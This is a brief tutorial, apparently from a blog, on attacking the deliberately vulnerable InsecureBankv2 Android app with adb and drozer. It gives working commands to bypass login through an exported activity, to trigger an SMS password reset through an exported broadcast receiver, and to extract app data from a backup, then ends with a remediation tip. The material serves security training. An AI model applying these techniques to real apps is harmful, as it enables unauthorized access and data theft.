First of all, we need to forward the connection so type this command using the Android Debug Bridge (ADB)
adb forward tcp:31415 tcp:31415
Funny, 31415 is the start of the mathematical constant PI.
Now connect to drozer.
drozer console connect
How to Bypass the Login Screen?
To bypass the login screen we first need to get the activity info.
run app.activity.info -a com.android.insecurebankv2
Now lets bypass!
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin
Success!! it now should log you in.
How to Reset the Password Through SMS?
If you want to reset the password through SMS, type in this command here.
adb shell am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver --es phonenumber --es newpass
Awesome!, it should send you an SMS with the new password.
How to Reveal Sensitive Information From Backup?
First, we need to perform a backup so type in this command here.
adb backup -f backup.ab com.android.insecurebankv2
Now, we need to extract this backfile using Android Backup Extractor tool.
java -jar abe.jar unpack
When we unzip backup.zip, there should be some juicy information.
Hope you enjoyed this information,
Remember practice is the key to success.
Let’s first decode the APK and retrieve the Manifest file.
apktool decode AndroidManifest.xml
Open the AndroidManifest.xml in a text editor and you will see that, the majority of the Activities and the BroadcastCastReciever has “exported” set to true, this is what causes the Application to be vulnerable.
Make sure that “exported” is set to false